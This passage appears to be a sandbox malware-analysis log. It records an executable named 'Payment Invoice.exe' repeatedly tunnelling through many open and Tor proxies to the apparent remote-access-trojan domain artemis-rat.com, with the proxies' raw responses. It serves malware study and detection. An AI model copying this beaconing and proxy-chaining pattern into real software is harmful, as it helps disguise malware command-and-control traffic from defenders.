                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.815845013 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1157192.168.2.45337047.76.163.11531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.661446095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.984766960 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1158192.168.2.453533172.67.182.150807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.667392015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.822096109 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1159192.168.2.453372213.252.245.22161167076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.676032066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.435245037 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1160192.168.2.453550104.16.105.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.677344084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.831995964 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1161192.168.2.45291247.222.18.105837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.688971996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:53.514729023 CET76INHTTP/1.0 200 Connection Established
                                                                Proxy-agent: Apache/2.4.41 (Ubuntu)


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1162192.168.2.452770182.61.38.114827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.689021111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.049117088 CET295INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 150
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1163192.168.2.452843178.207.8.2031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.691248894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714646101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714694023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.342799902 CET202INHTTP/1.0 403 Forbidden
                                                                Content-Length: 691
                                                                Content-Type: text/html
                                                                Date: Mon, 11 Mar 2024 15:15:27 GMT
                                                                Expires: Mon, 11 Mar 2024 15:15:27 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1164192.168.2.453443116.203.28.43807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.695333004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.015387058 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1165192.168.2.453447188.166.17.1888817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.698606968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.014702082 CET310INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 150
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1166192.168.2.4535005.161.103.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.700386047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1167192.168.2.45337680.13.43.193807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.700920105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511389971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.621366978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.011502981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.527201891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.011466980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.511246920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.511074066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.323746920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1168192.168.2.45309242.61.48.21980007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.710334063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.351876974 CET74INHTTP/1.1 200 OK
                                                                date: Mon, 11 Mar 2024 14:55:11 GMT
                                                                server: svcproxy


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1169192.168.2.45277545.11.95.16660027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.711086988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.786062956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.510354996 CET39INHTTP/1.0 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1170192.168.2.453444115.146.225.137100467076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.715425014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1171192.168.2.451570171.244.140.160133917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.720012903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714653015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714685917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714592934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1172192.168.2.45350772.10.160.90162057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.722560883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1173192.168.2.453582104.27.122.6807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.735898018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.902684927 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1174192.168.2.452893107.180.90.24876987076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.739200115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826200008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1175192.168.2.453466185.220.226.1288087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.746460915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1176192.168.2.45287666.228.33.19078417076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.749639988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826391935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.027005911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
